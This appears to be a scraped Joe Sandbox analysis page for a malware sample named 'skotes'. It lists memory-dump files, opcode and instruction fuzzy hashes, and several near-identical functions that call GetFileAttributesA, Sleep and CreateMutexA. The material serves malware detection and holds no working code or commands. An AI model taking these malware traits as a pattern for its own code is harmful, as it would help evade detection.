Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2~
API String ID: 396266464-3459864372
Opcode ID: 8a2683a3e449145291a29919316d0760408797a5d223b66bec01ff1aa5394618
Instruction ID: d069f04a71341b5da7c1b8b2a807c8b5a43016ffde4d9906f82244eae6e39740
Opcode Fuzzy Hash: 8a2683a3e449145291a29919316d0760408797a5d223b66bec01ff1aa5394618
Instruction Fuzzy Hash: A4310931B94244EBFB18ABB8DC8D75DBB72EB85310F24425EE0149B3D5D73D59808752

Function 0078A1AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0078A1B1
Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2~
API String ID: 396266464-3459864372
Opcode ID: 5ee3c3b47fe6e97819f9fa7cb96e5272fa07affdb4e04a73897ebe8962552a52
Instruction ID: 91cc526e5f58b9234bde4a71a941c145190ee8b5b4e3d47b743df269a624952d
Opcode Fuzzy Hash: 5ee3c3b47fe6e97819f9fa7cb96e5272fa07affdb4e04a73897ebe8962552a52
Instruction Fuzzy Hash: 54310731B44244EBFB18ABB8DC8DB6DBB72ABC6310F24421EE0549B3D5D73D59808752

Function 0078A2E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 134
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0078A2E6
Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2~
API String ID: 396266464-3459864372
Opcode ID: d67332af538ea0ebdc20a3a00957423994ce602570c24cef0671b54eaa91f697
Instruction ID: 4b58c797ca58bcc622c784ab9930deb90ef88aca5a2e49ebf2a50f075a95a78b
Opcode Fuzzy Hash: d67332af538ea0ebdc20a3a00957423994ce602570c24cef0671b54eaa91f697
Instruction Fuzzy Hash: E3314C31B84240EBFB18AB78DC8D76DBB72EB96310F20821EE0149B7D5D73D99808712

Function 0078A418 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0078A41B
Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2~
API String ID: 396266464-3459864372
Opcode ID: 24cc29b40924bd87d2c7212ee1bfbfff81c17d41ee2b76e06ce09ccfa885b5b3
Instruction ID: 996d5184de4d5e41ee193855549615838b28ac1ad2a85320b59d1a604430b29c
Opcode Fuzzy Hash: 24cc29b40924bd87d2c7212ee1bfbfff81c17d41ee2b76e06ce09ccfa885b5b3
Instruction Fuzzy Hash: 60312B31B44140EBFF18ABBCD88D76DBA61EB85310F20421AE058DB3D6D77D59808762

Function 0078A54D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0078A550
Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2~
API String ID: 396266464-3459864372
Opcode ID: 906b8a0022529633cdd44000ae66da9233dd5f28bd11794f7981d9f822637e60
Instruction ID: a94bfc7f3ebc97bebc9eada0836c4f5894c0197220231f912207f40837885794
Opcode Fuzzy Hash: 906b8a0022529633cdd44000ae66da9233dd5f28bd11794f7981d9f822637e60
Instruction Fuzzy Hash: D5313931B45140EBFB18EBB8DC8DB6CBB61EB85314F24421AE0549B3D6DB3D9D808712

Function 0078A682 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0078A685
Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2~
API String ID: 396266464-3459864372
Opcode ID: 9728f3d1c4ed317fad9e55290ee506f46426f5f00261f098d56067e7eba51a2d
Instruction ID: 073111105e5da501ed49d83af8b27bf39d799aa0b98106ef7ed9c4870aee8d0c
Opcode Fuzzy Hash: 9728f3d1c4ed317fad9e55290ee506f46426f5f00261f098d56067e7eba51a2d
Instruction Fuzzy Hash: F7312771744244EBFB18AB78DC8DB6DBB72EB85320F24825AE0149B2D6D73D99808752

Function 0078A7B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0078A7BA
Sleep.KERNELBASE(00000064,?), ref: 0078A963
CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981

Strings

T2~, xrefs: 0078A970

Memory Dump Source

